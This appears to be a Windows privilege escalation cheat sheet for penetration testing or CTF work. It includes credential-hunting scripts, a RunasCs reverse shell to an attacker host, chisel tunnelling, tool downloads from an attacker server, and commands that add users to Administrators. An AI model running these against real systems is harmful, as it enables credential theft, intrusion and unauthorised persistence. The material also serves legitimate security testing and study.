Windows Privilege Escalation
Last modified: 2023-08-24
Privilege escalation (PrivEsc) on Windows is the process of moving from a low-privileged user to Administrator or SYSTEM, for example by obtaining Administrator credentials and logging in with them.
WinPEAS scans the Local Privilege Escalation vulnerabilities on Windows machine automatically.
Start a web server on the attacker machine so that the target can fetch WinPEAS:

```sh
python3 -m http.server 8000
```

Then download it on the target:

```cmd
cd \Users\<user-name>\Desktop
powershell Invoke-WebRequest -Uri http://<your-local-ip>:8000/winPEAS.bat -OutFile .\winPEAS.bat
# or
curl http://<your-local-ip>:8000/winPEAS.bat -o .\winPEAS.bat
```

WinPEAS is widely signatured by antivirus; if it is deleted on download, enumerate manually with the commands below.
LOLBAS (Living Off The Land Binaries, Scripts and Libraries) catalogues executables already present on Windows that can be misused, for example to download files or execute code without bringing in tools of our own. Check the project's web page for the binaries available on the target.
```cmd
hostname
systeminfo
systeminfo | findstr "OS"
ver

# Current user
whoami
whoami /user
whoami /groups
whoami /priv
whoami /all
echo %username%

# List users and groups
net user
net users
net user USERNAME
net group          # domain groups; only works against a domain controller
net localgroup
# List users in a specific group
net localgroup "Remote Management Users"

# Network
ipconfig
ipconfig /all
route print
arp -a

# Firewall
netsh firewall show state      # legacy context, may be unavailable on recent Windows
netsh firewall show config
netsh advfirewall show allprofiles
```
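The output of `whoami /priv` and `whoami /groups` is what most often decides the privilege escalation path, so it is worth parsing rather than reading by eye. The following PowerShell script is an added example, not code from the original page: it flags the privileges and local group memberships that are commonly abused for elevation (the list of "interesting" names is the editor's own choice) and tells the UAC-filtered case ("Group used for deny only") apart from a genuinely elevated token.

```powershell
# Added example: summarise the privesc-relevant parts of "whoami /priv" and "whoami /groups".
# The privilege and group lists below are the editor's assumptions, not a page-defined set.

$InterestingPrivileges = @(
    'SeImpersonatePrivilege',        # token impersonation from a service account
    'SeAssignPrimaryTokenPrivilege',
    'SeBackupPrivilege',             # read any file, e.g. SAM/SYSTEM hives
    'SeRestorePrivilege',            # write any file, e.g. service binaries
    'SeTakeOwnershipPrivilege',
    'SeDebugPrivilege',              # open SYSTEM processes
    'SeLoadDriverPrivilege',
    'SeManageVolumePrivilege'
)

# Well-known SIDs of local groups that matter for remote access and elevation.
$InterestingGroupSids = @{
    'S-1-5-32-544' = 'Administrators'
    'S-1-5-32-551' = 'Backup Operators'
    'S-1-5-32-555' = 'Remote Desktop Users'
    'S-1-5-32-580' = 'Remote Management Users'
}

function Get-InterestingPrivileges {
    # "whoami /priv" prints a padded table; privilege rows start with "Se...Privilege"
    # and end with the state column.
    whoami /priv | ForEach-Object {
        if ($_ -match '^(Se\w+Privilege)\s.*\s(Enabled|Disabled)\s*$' -and
            $InterestingPrivileges -contains $Matches[1]) {
            [pscustomobject]@{ Privilege = $Matches[1]; State = $Matches[2] }
        }
    }
}

function Get-InterestingGroups {
    # Match on the SID column so the check is locale-independent. "Group used for
    # deny only" means the membership exists but UAC filtered it out of this token.
    whoami /groups | ForEach-Object {
        if ($_ -match '(S-1-5-32-\d+)' -and $InterestingGroupSids.ContainsKey($Matches[1])) {
            [pscustomobject]@{
                Group    = $InterestingGroupSids[$Matches[1]]
                Sid      = $Matches[1]
                Filtered = ($_ -match 'deny only')
            }
        }
    }
}

function Get-PrivEscSummary {
    $principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
    [pscustomobject]@{
        User       = "$env:USERDOMAIN\$env:USERNAME"
        Privileges = @(Get-InterestingPrivileges)
        Groups     = @(Get-InterestingGroups)
        # True only when the Administrators membership is active in this token.
        Elevated   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    }
}

$summary = Get-PrivEscSummary
"User: $($summary.User)   Running elevated: $($summary.Elevated)"
$summary.Privileges | Format-Table -AutoSize
$summary.Groups     | Format-Table -AutoSize
```

A privilege listed as Disabled is still usable: it can be enabled in the token, so the script reports both states. A member of Administrators whose membership shows as Filtered is an admin behind UAC, which calls for a UAC bypass rather than a classic privilege escalation.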
After enumerating the OS version and installed hotfixes from systeminfo, look up public privilege escalation vulnerabilities affecting that build.
Recently opened files can point to interesting documents. To list them:
- Right-click on the Windows icon.
- Click "Run".
- Type "recent" in the text box and press Enter.
Processes and services are enumerated mainly with the Windows Management Instrumentation command line (WMIC). WMIC is deprecated in current Windows releases and may be missing; PowerShell's Get-CimInstance returns the same data.

```cmd
wmic service list
wmic service list | findstr "Backup"

# Get target process info (parent process and executable path)
wmic process get processid,parentprocessid,executablepath | find "<process-id>"

# Get users' SIDs
wmic useraccount get name,sid

# Launch an executable hidden in an alternate data stream (ADS); run from PowerShell
wmic process call create $(Resolve-Path .\file.exe:streamname)

# Processes and services
sc query state=all
tasklist /svc

# Query the configuration of a specified service (binary path, start type, account)
sc qc "Development Service"
```
Browser history can reveal internal applications and saved logins:
- In Internet Explorer, click the star icon and select the History tab.
- In Edge or Chrome, click the kebab menu icon at the top-right and click History.
The Volume Shadow Copy Service (VSS) coordinates the actions required to create a consistent shadow copy (also known as a snapshot or point-in-time copy) of the data to be backed up. Shadow copies are interesting because they contain readable copies of files that are locked on the live volume, such as the SAM and SYSTEM registry hives. Listing them requires an elevated prompt.

```cmd
vssadmin
vssadmin list shadows
vssadmin list volumes
```
```cmd
# /s: Searches the current directory and all subdirectories.
# /i: Ignores the case of the characters.
findstr /si password *.txt *.xml *.ini
findstr /si password c:\Users\Administrator\*.txt
findstr /si cred *.txt *.xml *.ini
findstr /si cred c:\Users\Administrator\*.txt

# /p: Skips files with non-printable characters.
# /n: Prints the line number of each line that matches.
findstr /spin "password" *.*
findstr /spin "password" c:\Users\Administrator\*

# List files
# /a: With no attribute list, shows all files, including hidden and system files.
dir /a \Users\Administrator\Desktop
# /s: Lists every occurrence of the specified file name within the specified directory and all subdirectories.
dir /s *pass* == *cred* == *vnc* == *.config*
# /q: Displays the ownership information.
dir /q \Users\Administrator\Desktop

# Website folder
dir c:\inetpub\

# SQL server
dir c:\SQLServer\Logs
type c:\SQLServer\Logs\ERRORLOG.BAK

# Get contents of a file
more .\example.txt
type .\example.txt

# Registry subkey information
# query: Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry
# HKLM: The key name of HKEY_LOCAL_MACHINE
# /f: Specifies the data or pattern to search for.
# /t: Specifies registry types to search.
# /s: Specifies to query all subkeys and value names recursively.
reg query HKLM /f password /t REG_SZ /s

# Check the Recycle Bin and its per-user SID folders (PowerShell; -Force shows hidden items)
dir -Force 'C:\$Recycle.Bin'

# ManageEngine (this product has many known vulnerabilities)
dir -Force 'C:\Program Files (x86)\ManageEngine\'
```
```powershell
# Files (errors for inaccessible directories are suppressed)
Get-ChildItem -Path C:\ -Filter "*.txt" -Recurse -ErrorAction SilentlyContinue
# Directories
Get-ChildItem -Path C:\ -Directory -Filter "Example" -Recurse -ErrorAction SilentlyContinue
```
Reference: Atomic Red Team
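The findstr, dir and reg query commands above express the same idea three times: find files whose name or content suggests credentials. The following PowerShell script is an added example, not code from the original page, that does the same in one pass with Select-String (line numbers included, as with `findstr /n`), skips large files, and checks the well-known Winlogon auto-logon registry values. The search roots, keywords, extensions and size limit are the editor's assumptions; adjust them per engagement.

```powershell
# Added example: credential hunting in files and the Winlogon registry key.
# $Roots, $Keywords, $Exts and $MaxBytes are editor-chosen defaults, not page values.

$Roots    = @('C:\Users', 'C:\inetpub', 'C:\ProgramData')
$Keywords = @('password', 'passwd', 'pwd=', 'cred', 'secret', 'connectionstring')
$Exts     = @('*.txt', '*.ini', '*.xml', '*.config', '*.json', '*.ps1', '*.bat', '*.cmd', '*.log', '*.rdp')
$MaxBytes = 5MB   # skip big files: binaries and dumps waste time and produce junk hits

function Find-CredentialFiles {
    # Names that are interesting on their own (the "dir /s *pass* == *cred* == *vnc*" idea).
    param([string[]]$Paths = $Roots)
    Get-ChildItem -Path $Paths -Recurse -Force -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match 'pass|cred|vnc|unattend|sysprep|web\.config|\.kdbx$|\.rdp$' } |
        Select-Object FullName, Length, LastWriteTime
}

function Find-CredentialStrings {
    # Content search, the Select-String equivalent of "findstr /spin".
    param([string[]]$Paths = $Roots)
    $regex = ($Keywords | ForEach-Object { [regex]::Escape($_) }) -join '|'
    Get-ChildItem -Path $Paths -Recurse -Force -File -Include $Exts -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -le $MaxBytes } |
        Select-String -Pattern $regex -ErrorAction SilentlyContinue |
        Select-Object Path, LineNumber, @{ n = 'Line'; e = { $_.Line.Trim() } }
}

function Get-WinlogonAutoLogon {
    # Well-known registry location for a plaintext auto-logon password.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    Get-ItemProperty -Path $key -ErrorAction SilentlyContinue |
        Select-Object AutoAdminLogon, DefaultDomainName, DefaultUserName, DefaultPassword
}

Find-CredentialFiles   | Format-Table -AutoSize
Find-CredentialStrings | Format-Table -AutoSize -Wrap
Get-WinlogonAutoLogon
```

Select-String is case-insensitive by default, matching `findstr /i`. Expect noise from words like "credential" in help text; the line number and path in each hit make it quick to discard.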
Outlook data files (.pst and .ost), which may contain emails with credentials or internal information, live in the following directories:

```
C:\Users\<username>\Documents\Outlook Files
C:\Users\<username>\AppData\Local\Microsoft\Outlook
```
If we find a listening port that is only reachable on the target (for example one bound to 127.0.0.1), we need port forwarding to access it from the local machine.
For example, assume port 8000 is listening on the target. After running the following commands, the target's port 8000 is reachable locally at
[http://localhost:8000](http://localhost:8000).

```sh
# Local (attacker) machine: start the server first
chisel server --reverse -p 9999

# Remote (target) machine: connect back and forward its local port 8000
chisel.exe client 10.0.0.1:9999 R:8000:127.0.0.1:8000
```
Please refer to this page to check how to use Chisel for port forwarding.
Local users can also be reviewed in the Computer Management utility. To open it, type "computer management" in the search box at the bottom of the screen.
In Computer Management, click "Local Users and Groups".
- Click "Users".
- Double-click each user for details such as "Member Of".
- Click "Groups".
- Double-click each group.
- Try adding a user to a group: on misconfigured systems this can succeed even without administrator rights.
To grant a user access to a file from the GUI:
- Right-click on the file.
- Select "Properties".
- Click the Security tab.
- Click "Advanced".
- In the Permissions tab, click "Add".
- Click "Select a principal".
- Enter the username in the text field.
- Click OK and Apply.
Permissions can also be changed from the command prompt or PowerShell with icacls (F = full control):

```cmd
icacls "C:\Path\to\file" /grant Users:F
icacls "C:\Path\to\file" /grant Everyone:F
```
```cmd
# Change a user's password
net user USERNAME NEWPASSWORD

# Add a new user
net user /add USERNAME PASSWORD

# Add a user to a group
net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add    # for WinRM
net localgroup "Remote Desktop Users" USERNAME /add       # for RDP

# Remove a user from a specific group
net localgroup "Remote Management Users" USERNAME /delete
```
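The net commands above do not tell us whether a step silently failed, which matters when we are testing whether a non-administrator can touch group membership at all. The following PowerShell script is an added example, not code from the original page: it performs the same create-or-reset and add-to-group steps with the LocalAccounts cmdlets, reports the access-denied case, and verifies the resulting membership. The user name and group list are placeholders chosen by the editor.

```powershell
# Added example: create (or reset) a local user, add it to groups, and verify the result.
# $UserName and $Groups are placeholders; the password is prompted for, never hard-coded.

$UserName = 'svc_audit'
$Groups   = @('Administrators', 'Remote Management Users')   # the second enables WinRM logon
$Password = Read-Host -AsSecureString -Prompt "Password for $UserName"

function Add-PrivilegedLocalUser {
    param([string]$Name, [securestring]$Password, [string[]]$Groups)
    try {
        if (Get-LocalUser -Name $Name -ErrorAction SilentlyContinue) {
            Set-LocalUser -Name $Name -Password $Password -ErrorAction Stop        # "net user NAME PASS"
        } else {
            New-LocalUser -Name $Name -Password $Password -PasswordNeverExpires -ErrorAction Stop | Out-Null
        }
        foreach ($g in $Groups) {
            # Membership names come back as COMPUTER\user, so match on the suffix.
            $members = Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue
            if (-not ($members.Name -like "*\$Name")) {
                Add-LocalGroupMember -Group $g -Member $Name -ErrorAction Stop     # "net localgroup G NAME /add"
            }
        }
        return $true
    } catch {
        # The usual failure when we are not an administrator is "Access is denied".
        Write-Warning "Failed: $($_.Exception.Message)"
        return $false
    }
}

function Test-GroupMembership {
    param([string]$Name, [string[]]$Groups)
    foreach ($g in $Groups) {
        $hit = (Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue).Name -like "*\$Name"
        [pscustomobject]@{ Group = $g; Member = [bool]$hit }
    }
}

if (Add-PrivilegedLocalUser -Name $UserName -Password $Password -Groups $Groups) {
    Test-GroupMembership -Name $UserName -Groups $Groups | Format-Table -AutoSize
}
```

The verification step is the point: an Add-LocalGroupMember that throws is obvious, but a group that looks writable in Computer Management can still reject the change, and only re-reading the membership proves it took effect.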
Once the user is in the relevant group, connect to the target over WinRM or RDP.
```cmd
# Check whether the current user belongs to the Administrators group.
net user USERNAME

# Move to the directory containing the desired file
cd \Users\Administrator\Desktop

# Take ownership of the files; works with SeTakeOwnershipPrivilege (e.g. as an administrator)
# or when we already hold the WRITE_OWNER right on the file.
# /R: recursive operation
# /F: specify the filename
takeown /r /f *.*

# Modify the discretionary access control list on the specified files
# /q: suppress success messages
# /c: continue the operation despite any file errors
# /t: perform the operation on all specified files in this directory and subdirectories
# /grant: grant the specified user access rights
icacls "example.txt" /q /c /t /grant Users:F
```
The built-in runas command prompts for the password interactively:

```cmd
runas /user:<domain>\<username> cmd
```

If runas cannot be used, for example because we only have a non-interactive reverse shell and cannot answer its password prompt, RunasCs can spawn a shell as another user.
First, start a listener on the local machine:

```sh
nc -lvnp 4444
```

Then execute the following command on the target machine, replacing username and password with the credentials of the user we want to switch to:

```cmd
RunasCs.exe username password cmd -r 10.0.0.1:4444
```
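Before reaching for an external tool, it is worth knowing that PowerShell can already launch a process as another user without an interactive password prompt. The following script is an added example, not code from the original page or from the RunasCs project: it uses Start-Process with a PSCredential, which goes through the same secondary-logon path as runas but takes the password from a variable, and captures the new process's output to a file so the identity can be verified. The user name, password and output path are placeholders chosen by the editor.

```powershell
# Added example: run a command as another local user from a non-interactive shell.
# Account, password and output path are placeholders.

$User = "$env:COMPUTERNAME\backupadmin"
$Pass = ConvertTo-SecureString 'Placeholder-Password-1!' -AsPlainText -Force
$Cred = [pscredential]::new($User, $Pass)
$Out  = 'C:\Windows\Temp\whoami_as_user.txt'      # must be writable by that user

function Invoke-AsUser {
    param([pscredential]$Credential, [string]$Command, [string]$OutFile)
    # cmd /c so the redirection happens inside the new process, which runs as $Credential.
    $p = Start-Process -FilePath 'cmd.exe' `
        -ArgumentList "/c $Command > `"$OutFile`" 2>&1" `
        -Credential $Credential -WindowStyle Hidden -PassThru
    $p.WaitForExit()
    if ($p.ExitCode -ne 0) { Write-Warning "cmd.exe exited with code $($p.ExitCode)" }
    Get-Content -Path $OutFile -ErrorAction SilentlyContinue
}

# Prove which identity the child process has before running anything else as it.
Invoke-AsUser -Credential $Cred -Command 'whoami /all' -OutFile $Out
```

Start-Process -Credential depends on the Secondary Logon service and on the caller having a usable window station; from a session created by a service it can fail with "Access is denied". That is the case where RunasCs, which performs the logon itself, is the better choice.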
Other built-in consoles worth checking:
- Event Viewer
- Task Scheduler
Sysinternals is a suite of tools that offer technical resources and utilities to manage, diagnose, troubleshoot and monitor a Microsoft Windows environment.
```cmd
# Autoruns: shows which programs are configured to run at system boot or login.
autoruns.exe

# Process Explorer: a task manager and system monitor.
procexp.exe
procexp64.exe

# Process Monitor: shows file system, registry and process/thread activity in real time.
procmon.exe
procmon64.exe

# Strings: the equivalent of the Linux "strings" command.
strings.exe example.exe | findstr "sometext"
strings64.exe example.exe | findstr "sometext"
```